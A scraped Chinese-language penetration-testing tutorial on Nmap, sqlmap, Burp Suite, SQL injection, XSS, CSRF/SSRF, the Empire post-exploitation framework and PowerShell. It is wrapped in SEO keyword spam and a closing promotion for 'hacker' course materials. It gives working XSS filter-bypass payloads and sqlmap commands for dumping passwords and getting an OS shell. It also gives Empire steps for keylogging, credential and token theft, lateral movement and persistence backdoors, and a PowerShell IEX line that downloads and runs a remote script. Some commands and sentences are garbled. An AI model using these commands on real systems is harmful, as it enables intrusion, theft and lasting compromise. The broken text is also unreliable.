招投标网站建设开发,怎么样才算是一个网站页面,爱网站,网站建设教学视频1. Nmap的基本
Nmap ip 6 ip
Nmap -A 开启操作系统识别和版本识别功能
– T#xff08;0-6档#xff09; 设置扫描的速度 一般设置T4 过快容易被发现
-v 显示信息的级别#xff0c;-vv显示更详细的信息
192.168.1.1/24 扫描C段 192.168.11 -254 上
nmap -A -T4 -v -i…1. Nmap的基本
Nmap ip 6 ip
Nmap -A 开启操作系统识别和版本识别功能
– T0-6档 设置扫描的速度 一般设置T4 过快容易被发现
-v 显示信息的级别-vv显示更详细的信息
192.168.1.1/24 扫描C段 192.168.11 -254 上
nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 192.168.1.100 排除在外的目标 .100--------------- -----------------excludefile ~/targets.txtnmap 192.168.1.1 -p 80.443 网站 是否在这个端口部署网站nmap –traceroute 192.168.1.1 探测路由nmap -O 192.168.1.1 对目标进行指纹识别nmap -sV ---------- 对版本进行探测nmap -sF -T4 192.168.1.1 利用fin包对端口进行扫描识别是否被关闭收到RST包说明被关闭。否则是open 后者 fileter状态。 利用三次握手可以绕开防火墙nmap –scriptauthip 处理鉴权证书的脚本也可以作为检测部分应用弱口令-----------bruteip 暴力破解扫描脚本介绍:
位置 : nmap安装目录/scripts/ 例如/usr/share/nmap/scripts
脚本类型 ll /usr/share/nmap/scripts | grep ^- | wc -l 使用介绍:
nmap --scriptauth 192.168.137.*
负责处理鉴权证书绕开鉴权的脚本,也可以作为检测部分应用弱口令
nmap --scriptbrute 192.168.137.*
提供暴力破解的方式 可对数据库smbsnmp等进行简单密码的暴力猜解
nmap --scriptdefault 192.168.137.* 或者 nmap -sC 192.168.137.*
默认的脚本扫描主要是搜集各种应用服务的信息收集到后可再针对具体服务进行攻击。
nmap --scriptvuln 192.168.137.*
检查是否存在常见漏洞
nmap -n -p445 --scriptbroadcast 192.168.137.4
在局域网内探查更多服务开启状况
zenmap
Nmap 的图形化界面 2.SQLmap 简介
是一种开源的渗透测试工具可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。
支持的数据库MySQLOracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。
1 安装sqlmap前需要先安装Python3.X
https://www.python.org/downloads/windows/
2 在环境变量path中增加python3.x 安装路径
3 下载sqlmap并解压缩
地址https://sqlmap.org/
Python sqlmap.py -u http://xxx.xxx.xxx/
Python sqlmap.py –help 查看帮助 borp
sqlmap支持五种不同的注入模式
UNION query SQL injection可联合查询注入
uError-based SQL injection报错型注入
uBoolean-based blind SQL injection布尔型注入
uTime-based blind SQL injection基于时间延迟注入
uStacked queries SQL injection可多语句查询注入
2.sqlmap 常用命令参数
-u /–url 最基本格式 sqlmap -u “XXXXXXXXXXXXX/index.pho?id1”
-m 从文本中获取多个目标扫描但是每一个一个url. sqlmap -m urllist.txt
-r 从文件中加载HTTP请求这样的话就不需要再去设定cookiePOST数据….
–dbs 返回当前连接的数据库
–current-db 返回当前网站数据库的数据库用户
-D 指定数据库系统的数据库名
–tables 列举数据库表
-T 指定数据库表名
–columns 列举数据库表中的字段
-C 指定数据库表中的字段名
–dump 获取整个表的数据
3.设置回显等级
参数 -v默认为1
0 只显示python错误以及严重的信息
1 基本信息和警告信息
2 debug信息
3 注入的payload
级别越高显示信息越多
4同时显示HTTP请求。
5同时显示HTTP响应头。
6同事显示HTTP响应页面。
–data 把数以post方式提交sqlmap会像检测GET参数一样检测POST过去的参数。
–cookie 用于区分用户
可能会有漏洞当web登录时抓取数据包。
4.设置HTTP数据包相关参数
HTTP User-Agent 头
参数–random-agent 会从sqlmap/txt/user-agents.txt中随机产生User-Agent头。
sqlmap -u “http://www.target.com” --level 3 --andom-agent --dbs
sqlmap 检查uesr-agent中的注入点, level3才会去检查user-agent头是否存在注入漏洞
5.设定探测等级–level
共有五个等级 默认为1 sqlmap使用的payload可以在xml/payloads.xml中看到
–users 列数据库管理用户
–current-user 在数据库中目前连接的用户
–is-dba 判断当前是否为管理是的话返回true
–proxy 指定一个代理服务器 eg: -proxy http://xxxxxx.8080
–os-shell 前提需要网站的物理路径其次是需要有FIILE权限
6.Sqlmap“六步”
第一步判断是否注是注入点
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)”
检测该网站是否存在漏洞 白色加粗字体为注入点 也就是攻击对象 第二步获取数据库
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)” –dbs 第三步查看当前应用程序所用数据库
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)” --current-db 四列出指定数据库的所有表
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)” -D”security目标数据库”—tables 五读取指定表中的字段名称
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)” -D”security”-T users –colunms 六读取指定字段内容
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)” -D”security”-T users -C username,password –dumpdump下载脱库 判断当前数据库用户权限
sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id1(目标链接)” --is-dba
如果是TRUE 那么权限该用户很大。 -roles 列出数据库管理员角色
如果当前用户有权限读取包含所有用户的表输入该命令会列举出每个用户的角色
sqlmap -u “http://127.0.0.1/sqli-labs-master/Less-1/?id1” --roles -referer HTTPReferer头
当–level参数设定为3或3以上时会尝试对HTTP Referer注入。可以使用referer命令来欺骗如–referer https://mp.mysite.net
-sql-shell 运行自定义的sql语句
sqlmap -u “http://127.0.0.1/sqli-labs-master/Less-1/?id1” --sql-shell
运行任意操作系统命令
选择后台语言
sqlmap -u “http://127.0.0.1/sqli-labs-master/Less-1/?id1” --os-cmdwhoami –os-cmdwhoami
–os-shell
(以你的电脑为跳板对局域网进行渗透或留后门)
–file-read 从数据库服务器中读取文件 当前用户有权限使用特定的函数时读取的文件可以是文本也可以是二进制文件。
上传文件到数据库服务器中
–file-write
–file-dest
读取指定数据库用户的密码
sqlmap -u “http://xxxxx/fuzz/index.php?id1” --passwords -U root SQLMAP进阶 常用tamper脚本
apostrophemask.py 将引号替换为utf-8用于过滤单引号 易容术
适用数据库ALL
作用将引号替换为utf-8用于过滤单引号
使用脚本前tamper(“1 AND ‘1’1”)
使用脚本后1 AND %EF%BC%871%EF%BC%87%EF%BC%871
multiplespaces.py 围绕sql关键字添加多个空格 去绕过
适用数据库ALL
作用围绕sql关键字添加多个空格
使用脚本前tamper(‘1 UNION SELECT foobar’)
使用脚本后1 UNION SELECT foobar
3. Burp Suite工具
一配置及代理设置
1.使用前配置
①选择代理Proxy选项卡
②选择设置option选项卡
③Edit Running打勾 124.0.0.1:8080 配置成功 历史访问 二功能模块讲解 模块介绍
send to spider 发送给爬虫模块
do a active scan 进行一次主动扫描
send to intruder 发送给爆破模块
send to repearter 发送给重放模块
send to comparer 发送给比对模块
send to decoder 发送给解码模块
request in browser 将请求在浏览器重放
四MYSQL与SQL注入
mysql知识点- 基本查询语句
查询表中全部信息 select *from 表明-关键的函数 select以下语句 version() 数据库版本database() 数据库名user() 用户名current\_user() 当前用户名system\_user() 系统用户名datadir 数据库路径version\_compile\_os 操作系统版本
-order by排序 语法
-联合查询
order by 1—
order by 2—确定字段数
使用UNION操作符注入另外一个select查询并将查询结果附加在第一次查询结果之后。第二次查询能够从另外一个完全不同的数据库表中提取数据
注意 相同的列结构 需要有知道表结构列结构exists函数猜解表明information\_schema 是一个mysql系统自带的元数据库
information_schema.SCHEMATA 查看所有的数据库
五、 XSS基础
1、什么是XSS? 中文名为跨站脚本攻击跨站脚本(Cross-Site Scripting, XSS)当目标网站用户在渲染HTML文档的过程中出现非预期的脚本指令并执行时XSS就发生了。
2、攻击者给予应用恶意XSS代码导致用户访问应用或服务器时执行代码导致被XSS攻击。
攻击者→服务器→用户xss是一种迫使Web站点回显可执行代码的攻击技术而这些可执行代码由攻击者提供、最终为用户浏览器加载
3、XSS的危害 1.网络钓鱼包括盗取各类用户的账号 2.窃取用户cookies资料从而获取用户信息。3.获取客户端信息IP/端口等4.劫持用户浏览器会话从而执行任意操作5.强制弹出窗口。6.网页挂马进行恶意操作7.进行大量的客户端攻击 如DDoS攻击8.控制受害者机器向其他客户端攻击
4、XSS分类
①反射型 非持久型调取用户cookie或者进行钓鱼常常为通过引诱用户点击一个恶意链接来实施攻击。
特点
① 主要用于将恶意脚本附加到URL地址的参数中
② 只在用户单击url时触发,而且只执行一次,非持久化
③常用来窃取客户端 Cookies
或进行钓鱼欺骗.
④常常为通过引诱用户点击一
个恶意链接来实施攻击的
name为可控参数 我们可以通过执行恶意代码弹窗那么也能做些对我们有利的事情。 当我们构造好了如下恶意代码发送给受害者。 将会弹出用户的cookie值我们构造js代码将该cookie值发送至我们自己的服务器或者用XSS平台接收该cookie例如https://xsshs.cn/我们就能通过该cookie非法登录受害者的账户。 ②存储型 渗透 挂马 蠕虫病毒 出现在网站的留言、评论、日志等交互处被存储在数据库或者客户端中等再次浏览时受到攻击。
特点① 恶意代码被保存到目标网站的服务器中每次用户访问时都会执行脚本代码这种攻击具有较强的稳定性和持久性 ② 比反射型跨站脚本更具威胁性,并且可能影响到Web服务器自身的安全.③ 一般出现在网站的留言、评论、日志等交互处,
页面原理
POST提交数据生成、读取文本模拟数据库
提交数据之后页面会将数据写入sql.txt
再打开页面时会读取sql.txt中内容并显示在网页上
实现了存储型xss攻击模拟。
当输入恶意代码即会执行
并且恶意代码会一直存储在服务器每当有用户访问该页面即会触发恶意代码 利用XSS弹出恶意警告框
网页不停刷新 http://192.168.127.1/ctfteach/demo/xss/reflect_xss.php?name
获得cookie
劫持流量跳转到你的博客强行吸粉
③dom型 将XSS代码嵌入dom文档每一个网页通过JS脚本对文档对象进行编辑从而修改页面元素增加漏洞。
xss平台
1.获取COOKIE(这是必须的最基本的功能)
2.获取源码(取当前网页的源码)
3.截图(可自己修改为连续截图)
4.……………
https://xss.pt
https://xssaq.com
XSS利用——无任何过滤
alert(1);
img src1 οnerrοralert(“xss”); //onerror等事件可以调用js
input οnfοcus“alert(‘xss’);” autofocus
svg οnlοadalert(“xss”);
XXS绕过
关键字绕过 空格绕过 用/代替空格 img/src“x”/οnerrοralert(“xss”); 关键字绕过 大小写绕过 利用其他标签 双写关键字 imimgg srsrccx οnerrοralert(“xss”); 字符拼接 img src“x” οnerrοr“aaler;bt;c‘(xss);’;eval(abc)”
利用函数进行编码绕过 Unicode绕过 img src“x” οnerrοr“eval(‘\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b’)” 利用函数进行编码绕过 ASCII码 img src“x” οnerrοr“eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))” Hex绕过 img srcx οnerrοreval(‘\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29’) Base64编码 img src“x” οnerrοr“eval(atob(‘YWxlcnQoJ3hzcycp’))”
过滤括号 当括号被过滤的时候可以使用throw来绕过
混淆 利用html标签格式的不严格、容错性。 关键字中加空格 加TAB 回车 url编码 img src“x” οnerrοr“eval(unescape(‘%61%6c%65%72%74%28%22%78%73%73%22%29%3b’))”
六Cref漏洞
1漏洞介绍: 一种对网站的恶意使用。与 xss相比不大流行因此对其防范相当稀少比xss更加具有危险性。
原理利用目标用户身份以目标用户名义执行非法操作以目标用户名义发邮件消息盗取目标账号购买商品虚拟货币转账等会泄露目标用户的财产安全。 PsCSRF漏洞经常用来制作蠕虫攻击刷SEO流量
靶场实战漏洞分析  Ssrf漏洞是一种由攻击者构造请求由服务器发起请求的安全漏洞。与csrf最大的区别是一个是服务器一个是由客户端发起的。
在域名后增加url语句从而利用ssrf漏洞篡改脚本访问的地址。
攻击方式如下
A对外网服务器所在的内网本地进行端口扫描获取的banner信息。
B攻击运行在内网或本地的应用程序。
C对内网web应用进行指纹识别识别企业内部的资产信息。
D.攻击内外网的web应用主要是用HTTP请求就可以实现的攻击比如struts2sqli
等等
E利用file协议读取本地文件。
SSRF漏洞利用
测试地址http://127.0.0.1.1/ssrf.php?Urlhttp:127.0.0.7/2.php
页面ssrf.php实现的功能获取GET参数URL然后将url的内容返回网页上。
如果将请求的网址篡改为http://www.baidu.com则会显示http://www.baidu.com的网页内容但是当设置参数URL为内网地址时则会泄露内网信息。
访问ssrf.php?Urlfile://C:/wwindows/win.ini即可读取本地文件。
Ssrf漏洞修复建议
限制请求的端口只能为web端口只允许访问HTTP和HTTPS的请求。 限制不能访问的内网ip以防止对内网进行攻击。 屏蔽返回的详细信息。 七Empire
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能还可以快速在后期部署漏洞利用模块其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等使用能够躲避内网检测和大部分安全防护工具的查杀简单来说就有点类似Metasploit是一个基于PowerShell的远程控制木马。
Empire运行在linux平台上
官方下载地址不过很久没有更新需要Python 2.6/2.7环境
https://github.com/EmpireProject/Empire
KALI示例
git clone https://github.com/EmpireProject/Empire.git
然后安装Empire的依赖命令如下
cd Empire
cd setup
pip install -r requirements.txt若没有安装pip库则需要先通过apt-get install pip进行安装
./install.sh
在安装完依赖以后返回上一级文件启动Empire工具命令如下
cd …
./empire
若启动失败则可能是因为依赖未完全安装好只需要手动通过pip install xxx安装未安装好的依赖即可。
启动时如果遇到如下报错
可以将urllib3版本降级
pip install urllib31.22
重新设定
bash reset.sh
基本使用会涉及如下内容
1.帮助文档
2.设置监听
3.生成木马
4.连接主机和基本使用
5.信息收集
6.权限提升
帮助文档
运行Empire后输入help命令查看具体的使用帮助。
设置监听步骤如下
listeners #进入监听线程界面
uselistener #设置监听模式
info #查看具体参数设置
set #设置相应参数
execute #开始监听
输入Listeners命令进入监听界面按TAB键可以补全命令按两次TAB键或者help可以显示可以利用的模块
输入uselistener来设置采用何种监听模式双击TAB可以看到有以下可以使用的模式。 设置监听
这里采用http监听模式输入uselistener http。
然后输入info命令查看具体参数设置。其中Require为True的值都需要被设置。
通过set配置参数并提供execeute执行需要注意的是Empire不同于MetasploitEmpire命令是区分大小写的 通过back返回上一级使用listeners或者list可以查看所设置的监听器 生成木马
输入usestager后 空格加TAB键 查看可以设置的木马模式 木马就类似Metasploit中的payload其中multi为通用模块osx是Mac操作系统的模块剩下的是Windows的模块。
我们以 windows/launcher_bat为例给大家说下过程其他的使用都类似
要使用launcher_bat首先输入usestager windows/launcher_bat然后输入info命令查看详细参数
通过set配置参数我们需要设置一个 Listener 参数即监听的名字前面我们给监听起得一个名字test1通过execeute执行
文件会生成到 tmp 目录下如下所示在目标主机上运行生成的launcher.bat输入 agents 可以查看已经获得的会话
我们再介绍另一种生成木马方式launcher
如果只需要简单的powershell 代码在设置完相应的参数后可直接在监听器listeners中输入命令 launcher 生成base64编码的代码
然后复制生成的payload 在目标机器上执行
可以看到有会话生成输入 agents 可以查看已经获得的会话
连接主机和基本使用
在目标主机反弹成功以后可以通过agents命令列出当前已连接的主机这里要注意如果有带有(*)的是已提权成功的主机。
然后使用interact命令连接主机可以使用Tab键补全主机的名称连接成功以后可以通过rename修改会话名称
可以通过help查看可以使用的命令 输入help agentcmds可以查看可供使用的常用命令输入help agentcmds可以查看可供使用的常用命令可以通过pwd查看当前目录
upload可以上传文件通过cat查看文件内容 使用某些CMD命令时要使用“shell命令的形式” 如下 Empire主要用于后渗透。所以信息收集是比较常用的一个模块可以使用searchmodule命
令搜索需要使用的模块这里通过键如usemodule collection然后按Tab查看完整的列表 1.屏幕截图
输入以下命令然后执行即可
2.键盘记录
输入以下命令usemodule collection/keylogger通过info可以查看详细信息execute执行 可以通过jobs kill JOB\_name停止键盘记录
3.ARP扫描
Empire也内置了ARP扫描模块输入以下命令即可使用该模块这里要设置Range参数
4.查找域管登陆服务器IP
在内网渗透中要想拿到内网中某台机器的域管权限方法之一就是找到域管登录的机器然后横向渗透进去窃取域管权限从而拿下整个域以下这个模块就是用来查找域管登录的机器的。
使用模块usemodule situational_awareness/network/powerview/user_hunter
权限提升
提权顾名思义就是提高自己在服务器中的权限就比如在Windows中你本身登陆的用户是Guest通过提权后就会变成超级管理员拥有了管理Windows的所有权限。以下是常见几种提权方式
1.Bypass UAC
UAC介绍
UACUserAccount Control用户账户控制简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。 为了远程执行目标的exe或者bat可执行文件绕过此安全机制以此叫BypassUAC不进行弹窗直接运行执行文件
输入以下命令设置Listener参数运行execute会发现成功上线了一个新的反弹
返回agents通过list可以看到有一个新的会话并且带有*说明提权成功。
2.PowerUp
Empire内置了PowerUp的部分工具用于系统提权主要有Windows错误系统配置漏洞、Windows Services漏洞、AlwaysInstallElevated漏洞等8种提权方式输入以下命令然后通过tab键查看完整列表
查找系统中的漏洞和PowerSploit下PowerUp中的Invoke-AllChecks模块一样该模块可以执行所有脚本检查系统漏洞
我们可以通过BypassUAC进行提权
3.通过溢出漏洞
本地溢出提权首先要有服务器的一个普通用户权限攻击者通常会向服务器上传本地溢出程序在服务器端执行如果系统存在漏洞那么将溢出Administrator权限。
这里我们使用ms16-032来提权输入以下命令即可通过溢出漏洞进行提横向渗透就是在已经攻占部分内网主机的前提下利用既有的资源尝试获取更多的凭据、更高的权限进而达到控制整个内网、拥有最高权限、发动类似 APT 的目的。
在横向渗透中最先得到的主机以及之后新得到的主机会成为突破口、跳板。如同一个不断扩大的圆形获得的主机越多圆能触及之处越大让其周遭的「横向」部分由未知成为已知。
1.令牌窃取
我们在获取到服务器权限后可以使用内置mimikatz获取系统密码执行完毕后输入creds命令查看Empire列举的密码。如下图所示
从这里发现有域用户曾在此服务器上登录此时可以窃取域用户身份然后进行横向移动
首先先来窃取身份使用命令pth这里的ID号就是creds下的CredID号我们这里来窃取administrator的身份令牌执行pth 7命令
使用steal_token PID命令就窃取了该身份令牌了如下图所示。
我们先尝试访问域内另一台主机WIN7-X86的“C$”顺利访问如下图所示。
输入revtoself命令可以将令牌权限恢复到原来的状态
2.会话注入
我们也可以使用usemodule management/psinject模块来进程注入获取权限输入info查看参数设置如下图所示。
设置下Listeners和ProcID这2个参数这里的ProcID还是之前的CMD的1380运行后反弹回一个域用户权限shell。
3.Invoke-PsExec
PsExec是我在Metasploit下经常使用的模块还有pstools工具包当中也有psexec缺点是该工具基本杀毒软件都能检测到并会留下日志而且需要开启admin$ 445端口共享。优点是可以直接返回SYSTEM权限。这里我们要演示的是Empire下的Invoke-Psexec模块。
使用该模块的前提是我们已经获得本地管理员权限甚至域管理员账户然后以此来进一步持续渗透整个内网。
我们测试该模块前看下当前agents只有一个IP为192.168.31.251机器名为WIN7-64的服务器如下图所示。
现在使用模块usemodule lateral_movement/invoke_psexec渗透域内另一台机器WIN7-X86输入info查看设置参数如下图所示。
这里要设置下机器名和监听输入下列命令反弹成功
输入agents命令查看当前agents多了一个IP为192.168.31.158机器名为WIN7-X86的服务器
攻击者在获取服务器权限后通常会用一些后门技术来维持服务器权限服务器一旦被植入后门攻击者如入无人之境。服务器重启后我们的后门程序仍能触发继续运行。这里讲一些window服务端常见的后门技术。
1.权限持久性劫持shift后门
shitf后门其实就是使用了windows系统的粘滞键功能当连按5次shift键的时候就会启动粘滞键程序。然后后门程序替换掉这个程序然后通过按5次就来启动后门。
输入命令usemodule lateral_movement/invoke_wmi_debuggerinfo模块可以输入info查看参数set设置相关参数
运行后在目标主机远程登录窗口按5次shift即可触发后门有一个黑框一闪而过如下图所示
这时看我们的Empire已经有反弹代理上线
2.注册表注入后门
使用usemodule persistence/userland/registry模块运行后会在目标主机启动项添加一个命令可以输入info查看信息
按如下命令设置其中几个参数如下图所示。
重启目标主机用户登录系统后会有反弹会话生成
在实际渗透中当拿到webshell上传的Metasploit客户端无法绕过目标主机的杀软时可以使用PowerShell来绕过也可以执行Empire的Payload来绕过成功之后再用Empire的模块将其反弹回Metasploit。
首先在Metasploit我们使用multi/script/web_delivery模块输入如下命令
使用usemodule code_execution/invoke_metasploitpayload模块输入info看下参数如下图所示
这里我们只需修改1个参数URL
修改为前面Metasploit生成的Using URL: http://192.168.199.129:8088/qJaa5sHBuNst5y
按下列命令设置完毕然后执行
Metasploit收到Empire反弹回来的shell如下图所示。
文件上传漏洞概述在现代互联网的我web应用程序中上传文件是一种常见的功能上传文件的时候如果服务器脚本语言对上传的文件进行严格的过滤就有可能上传恶意文件从而控制整个网站甚至是服务器。
存在原因传文件时如果服务器代码对客户端上传的文件进行验证和过滤就容易造成可以上传任意文件的情况包括上传脚本文件asp,aspx,php,jsp等格式的文件
危害:非法用户可以利用上传的恶意脚本文件控制整个网站。甚至控制服务器这个恶意文件又称webS核力量也可将脚本称为一种网页后门WebShell叫阿奔具有强大功能比如查看服务器中的文件执行系统命令。
2常见的上传检测规则
A服务器MIME类型检测Content-type内容
B客户端JavaScript检测 检测文件扩展名
C服务器目录路经检测path参数
D服务器文件名拓展名检测estension内容
E服务器文件内容检测是否合法或含有恶意代码
暴力破解漏洞产生与介绍
产生由于服务器端没有做限制导致攻击者可通过暴力的手段破解所需信息用户名密码验证码
酔 0
介绍“需要一个大的字典如4位数字的验证码暴力破解关键在于字典的大小常见用于爆破弱口令。
逻辑漏洞
就是指攻击者鲤鱼精业务的设计缺陷获取敏感信息或破坏业务的完整性
越权访问水平和垂直越权 。
越权访问攻击测试链接http://172.16.200.12/yuequan/test2/admin/viewpassword.
WAFweb应用防火墙是通过执行一系列对HTTP/HTTPS的安全策略来专门为web应用提供保护。
WAF类型 软件型直接检测服务器上是否存在WEBshell
硬件型支持多种部署在旁听监听模式时只记录攻击不进行拦截
云waf一般以反向代理的形式工作通过配置NS记录干活CNAME记录是对网站的请求优先经过WAF主机经过WAF过滤后将认为无害的请求报文在传输给实际网站服务器进行请求
网站系统内置WAF在网站内内置的过滤直接镶嵌在代码里自由度比较高有以下四种①输入参数强制类型转换②输入参数合法性检测③关键函数执行对经过代码流程的输入进行检测④对输入的数据进行替换过后再继续执行代码执行流程网站系统内置的WAF与业务更加切合在对安全与业务都比较了解的情况下可更
少的收到误报与漏报。
WAF判断 方法①SQLMap 输入sqlmap.py -u “http://xxx.com” --identify-waf --batch 便可找到waf类型
②直接在相对应网站的url后加最基础的测试语句并放在一个不存在的参数名中。
绕过waf的方法1大小写混合
2url编码
3替换关键字
4使用注释
5多参数请求拆分
6HTTP参数污染
7生僻函数
8寻找网站原站IP
9注入参数到cookies中
Meteasploit技术
在使用Kali操作系统是应注意即使更新源就像平时及时更新手机APP更新命令如下
Aapt-get update:只更新软件包的索引源作用同步源的软件包的索引信息从而进行软件更新。
BApt-get upgrade:升级系统上安装的所有软件包如果失败则保持更新之前的状态。
Apt-get dist-upgrade:升级整个Liunux系统不仅升级所有已安装的软件包而且会处理升级过程中可能出现的冲突在某些情况下他的部分升级需要人工参与。
渗透攻击大致步骤
*扫描目标及系统寻找可用漏洞。
*选择并配置一个漏洞利用模块。
*选择并配置一个攻击利用模块。
*选择一个编码技术用来绕过杀毒软件的查杀。
*渗透攻击。
Powershell
是一种基于任务的命令行解释器和脚本环境可以说是一种强大的shell,如同linux的bash,专为系统管理员而设计以.NET框架为平台Windows PowerShell帮助IT专业人员和超级用户控制和自动化管理Windows操作系统和运行在操作系统上的应用。现被更广泛用于渗透测试等方面在不需要写入磁盘的情况下执行命令也可以逃避Anti-Virus检测。另外可以把PowerShell看作命令行提示符cmd.exe的扩充。
对于渗透使用PowerShell场景
第一种我们需要获得免杀或者更好的隐蔽攻击对方的win机器可以通过钓鱼等方式直接执行命令
第二种我们已经到了对方网络或是一台DMZ的win机器那么我们利用PowerShell对内网继续深入
基于.NET框架
操作系统信任
提供win系列操作系统的几乎一切访问权限
win7之后默认安装
脚本可以运行在内存中不需要写入磁盘
cmd.exe通常会被安全软件阻止一般PowerShell不会
常用攻击工具
可以输入Get-Host或者$PSVersionTable.PSVERSION命令查看当前系统的PowerShell版本。
一个PowerShell脚本其实就是一个简单的 文本文件这个文件包含了一系列的 PowerShell命令每个命令显示为独立的一行PowerShell文件的后缀为 .PS1。
执行策略
为防止恶意脚本的执行PowerShell有一个执行策略默认情况下这个执行策略被设置为受限。
我们可以使用 Get-ExecutionPolicy 命令查看PowerShell当前的执行策略。它有4个策略。
Restricted脚本不能运行(默认设置)
RemoteSigned本地创建的脚本可以运行但是从网上下载的脚本不能运行(拥有数字证书签名的除外)
AllSigned仅当脚本由受信任的发布者签名时才能运行
Unrestricted允许所有的脚本执行
另外修改PowerShell执行策略Set-ExecutionPolicy 策略名 #该命令需要管理员权限运行
运行脚本
运行一个脚本必须键入完整的路径和文件名例如你要运行一个名为a.ps1的脚本可以键入c:\script\a.ps1
但如果PowerShell脚本文件在你的系统目录中那么在命令提示符后直接键入脚本文件名即可运行如.\a.ps1的前面就加上“.\”这和在Linux下执行Shell脚本的方法一样。
管道
管道的作用就是将一个命令的输出作为另一个命令的输入两个命令之间用管道符号(|)连接
例如
假设停止所有目前运行中的以“note字符开头命名的程序
Get-Process note*|stop-process
基本知识
在PowerShell下类似“cmd命令”叫做“cmdlet” 其命令的命名规范很一致都采用了 动词-名词的形式如Net-Item动词一般为Add、New、Get、Remove、Set等。PowerShell还兼容cmd和Linux命令如查看目录可以使用 dir 或者 ls 并且PowerShell命令不区分大小写。
后面会以文件操作为例讲解PowerShell命令的基本用法 如果运行PowerShell脚本程序必须用管理员权限将Restricted策略改成Unrestricted
在渗透测试时就需要采用一些方法绕过策略来执行PowerShell脚本列举如下三种方式
1.绕过本地权限执行
2.本地隐藏绕过权限执行脚本
3.用IEX下载远程PS1脚本绕过权限执行
如果运行PowerShell脚本程序必须用管理员权限将Restricted策略改成Unrestricted
在渗透测试时就需要采用一些方法绕过策略来执行PowerShell脚本列举如下三种方式
1.绕过本地权限执行
2.本地隐藏绕过权限执行脚本
3.用IEX下载远程PS1脚本绕过权限执行
上传test.ps1到目标主机在cmd环境下在目标主机本地当前目录执行该脚本
powershell -exec bypass .\test.ps1
powershell.exe -exec bypass -W hidden -nop test.ps1
输入命令执行后会退出命令提示符
powershell -c IEX (New-Object System.Net.Webclient).DownloadString(‘http://192.168.10.11/test.ps1’)
对上述命令参数进行说明
ExecvtionPolicy Bypass-exec bypass绕过执行安全策略这个参数非常重要在默认情况下PowerShell的安全策略规定了PoweShell不允许运行命令和文件。通过设置这个参数可以绕过任意一个安全保护规则;
WindowStyle Hidden(-w hidden)隐藏窗口也就是执行完命令后窗口隐藏;
-command(-c)执行powershell脚本;
NoProfile(-nop)PowerShell控制台不加载当前用户的配置文件
NoLogo启动不显示版权标志的PowerShell
Nonlnteractive(-noni)非交互模式
Noexit执行后不退出shell这在使用键盘记录等脚本时非常重要
学习资料分享
当然只给予计划不给予学习资料的行为无异于耍流氓### 如果你对网络安全入门感兴趣那么你扫这里 如果你对网络安全感兴趣学习资源免费分享保证100%免费嘿客入门教程
网安嘿客全套学习视频
我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。 网安嘿客红蓝对抗所有方向的学习路线****
对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 学习资料工具包
压箱底的好资料全面地介绍网络安全的基础理论包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等将基础理论和主流工具的应用实践紧密结合有利于读者理解各种主流工具背后的实现机制。 面试题资料
独家渠道收集京东、360、天融信等公司测试题进大厂指日可待
嘿客必备开发工具
工欲善其事必先利其器。学习嘿客常用的开发软件都在这里了给大家节省了很多时间。
这份完整版的网络安全嘿客全套学习资料已经上传至CSDN官方朋友们如果需要点击下方链接也可扫描下方微信二v码获取网络工程师全套资料【保证100%免费】
